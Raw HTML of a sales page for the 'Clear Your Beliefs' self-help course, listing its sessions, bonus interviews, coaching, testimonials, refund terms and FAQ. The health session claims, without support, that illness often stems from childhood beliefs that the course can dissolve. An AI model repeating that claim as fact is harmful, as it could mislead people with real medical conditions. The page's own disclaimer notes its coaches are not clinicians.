src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// 